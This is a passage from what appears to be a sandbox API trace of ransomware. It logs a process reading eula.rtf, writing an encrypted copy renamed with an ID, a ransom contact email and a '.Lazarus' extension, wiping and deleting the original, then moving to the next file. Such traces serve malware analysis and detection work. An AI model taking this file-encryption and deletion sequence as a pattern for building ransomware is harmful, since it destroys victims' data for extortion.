HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71620 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0066.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0066.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.713] AreFileApisANSI () returned 1 [0066.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1037\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0066.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0066.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0066.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0066.714] AreFileApisANSI () returned 1 [0066.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0066.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 36 [0066.714] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.714] GetFileType (hFile=0x428) returned 0x1 [0066.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0066.714] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0066.714] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0066.714] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0066.715] CloseHandle (hObject=0x428) returned 1 [0066.715] AreFileApisANSI () returned 1 [0066.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0066.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 36 [0066.715] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.715] GetFileType (hFile=0x428) returned 0x1 [0066.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0066.715] CloseHandle (hObject=0x428) returned 1 [0066.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0066.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0066.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0066.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0066.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0066.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0066.716] AreFileApisANSI () returned 1 [0066.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0066.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 36 [0066.716] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3)) returned 1 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0066.716] AreFileApisANSI () returned 1 [0066.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0066.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.717] GetLastError () returned 0x0 [0066.717] SetLastError (dwErrCode=0x0) [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bbf8 [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0066.717] GetLastError () returned 0x0 [0066.717] SetLastError (dwErrCode=0x0) [0066.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x690d0 [0066.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0066.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0066.717] AreFileApisANSI () returned 1 [0066.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0066.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0066.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0066.717] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.751] GetFileType (hFile=0x428) returned 0x1 [0066.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0066.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0066.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0066.751] AreFileApisANSI () returned 1 [0066.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0066.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 36 [0066.752] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.752] GetFileType (hFile=0x420) returned 0x1 [0066.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0066.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0066.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.752] GetLastError () returned 0x0 [0066.752] SetLastError (dwErrCode=0x0) [0066.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.752] GetLastError () returned 0x0 [0066.752] SetLastError (dwErrCode=0x0) [0066.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.752] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0066.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0066.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0066.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0066.829] GetLastError () returned 0x0 [0066.829] SetLastError (dwErrCode=0x0) [0066.829] GetLastError () returned 0x0 [0066.830] SetLastError (dwErrCode=0x0) [0066.830] GetLastError () returned 0x0 [0066.830] SetLastError (dwErrCode=0x0) [0066.830] GetLastError () returned 0x0 [0066.830] SetLastError (dwErrCode=0x0) [0066.830] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0xac3, lpOverlapped=0x0) returned 1 [0066.830] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.833] GetLastError () returned 0x0 [0066.833] SetLastError (dwErrCode=0x0) [0066.833] GetLastError () returned 0x0 [0066.833] SetLastError (dwErrCode=0x0) [0066.833] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0066.833] GetLastError () returned 0x0 [0066.833] SetLastError (dwErrCode=0x0) [0066.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3) returned 0x7d080 [0066.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0066.833] GetLastError () returned 0x0 [0066.834] SetLastError (dwErrCode=0x0) [0066.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0066.834] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0xad0, lpOverlapped=0x0) returned 1 [0066.834] GetLastError () returned 0x0 [0066.834] SetLastError (dwErrCode=0x0) [0066.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0066.834] GetLastError () returned 0x0 [0066.834] SetLastError (dwErrCode=0x0) [0066.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0066.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0066.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0066.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0066.834] CloseHandle (hObject=0x428) returned 1 [0066.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.835] CloseHandle (hObject=0x420) returned 1 [0066.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0066.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0066.836] AreFileApisANSI () returned 1 [0066.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0066.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 36 [0066.836] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0066.837] GetFileType (hFile=0x420) returned 0x1 [0066.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0066.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.837] GetLastError () returned 0xb7 [0066.837] SetLastError (dwErrCode=0xb7) [0066.837] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0066.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.838] CloseHandle (hObject=0x420) returned 1 [0066.838] AreFileApisANSI () returned 1 [0066.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0066.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 36 [0066.838] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf")) returned 1 [0066.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0066.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0066.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0066.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0066.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0066.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0066.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0066.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0066.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0066.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bbf8 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0066.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.840] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.840] 